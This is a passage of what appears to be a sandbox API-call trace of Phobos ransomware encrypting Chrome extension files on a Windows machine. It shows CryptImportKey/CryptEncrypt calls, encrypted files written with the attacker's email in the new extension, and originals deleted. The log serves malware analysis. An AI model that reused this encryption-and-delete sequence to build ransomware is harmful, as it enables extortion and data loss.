(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.463] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.463] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.463] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x104, lpOverlapped=0x0) returned 1 [0148.464] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110, dwBufLen=0x110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110) returned 1 [0148.464] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x110, lpOverlapped=0x0) returned 1 [0148.465] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.465] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.465] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.465] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.465] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.465] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.465] CloseHandle (hObject=0x134) returned 1 [0148.465] CloseHandle (hObject=0x188) returned 1 [0148.466] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json")) returned 1 [0148.467] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.467] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=209) returned 1 [0148.467] CloseHandle (hObject=0x188) returned 1 [0148.467] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json")) returned 0x2020 [0148.467] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.467] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.468] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.468] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0148.468] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.468] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.468] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd1, lpOverlapped=0x0) returned 1 [0148.469] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0148.469] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0148.470] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.470] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.470] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.470] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.470] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.470] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.470] CloseHandle (hObject=0x188) returned 1 [0148.470] CloseHandle (hObject=0x134) returned 1 [0148.470] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json")) returned 1 [0148.471] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.471] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0148.472] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=352) returned 1 [0148.472] CloseHandle (hObject=0x134) returned 1 [0148.472] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json")) returned 0x2020 [0148.472] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.472] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0148.472] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.472] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.472] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0149.073] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0149.073] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.073] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x160, lpOverlapped=0x0) returned 1 [0149.077] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x170, dwBufLen=0x170 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x170) returned 1 [0149.077] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x170, lpOverlapped=0x0) returned 1 [0149.078] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0149.078] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.078] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0149.078] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.078] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0149.078] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.078] CloseHandle (hObject=0x134) returned 1 [0149.078] CloseHandle (hObject=0x188) returned 1 [0149.079] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json")) returned 1 [0149.079] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0149.079] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0149.080] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=3213) returned 1 [0149.080] CloseHandle (hObject=0x188) returned 1 [0149.080] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png")) returned 0x2020 [0149.080] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0149.080] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.080] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0149.081] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0149.081] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.081] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xc8d, lpOverlapped=0x0) returned 1 [0149.224] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc90, dwBufLen=0xc90 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc90) returned 1 [0149.224] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc90, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc90, lpOverlapped=0x0) returned 1 [0149.225] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32e28) returned 1 [0149.225] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.225] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0149.225] CryptDestroyKey (hKey=0xa32e28) returned 1 [0149.225] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0149.225] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.225] CloseHandle (hObject=0x188) returned 1 [0149.225] CloseHandle (hObject=0x134) returned 1 [0149.225] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png")) returned 1 [0149.226] SetEvent (hEvent=0x104) returned 1 [0149.226] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0149.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0149.227] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=246) returned 1 [0149.227] CloseHandle (hObject=0x134) returned 1 [0149.227] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json")) returned 0x2020 [0149.227] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0149.227] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.227] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0149.228] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0149.228] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.228] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xf6, lpOverlapped=0x0) returned 1 [0149.229] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100, dwBufLen=0x100 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100) returned 1 [0149.229] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100, lpOverlapped=0x0) returned 1 [0149.229] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32e28) returned 1 [0149.229] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.230] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0149.230] CryptDestroyKey (hKey=0xa32e28) returned 